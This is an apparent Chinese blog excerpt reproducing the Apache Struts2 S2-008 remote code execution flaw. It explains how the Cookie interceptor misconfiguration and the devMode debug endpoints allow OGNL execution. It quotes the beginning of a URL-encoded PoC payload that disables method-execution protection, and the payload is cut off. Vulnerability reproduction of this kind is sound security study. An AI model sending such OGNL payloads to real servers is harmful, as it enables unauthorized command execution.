0x24.Apache Struts2遠程代碼執行漏洞(S2-008)復現

s2-008:1.Cookie 攔截器錯誤配置可造成 OGNL 表達式執行;2.開啓 devMode 模式後會有多個調試接口能夠直接查看對象信息或直接執行命令; 構造poc驗證漏洞; poc: ?debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23
相關文章
相關標籤/搜索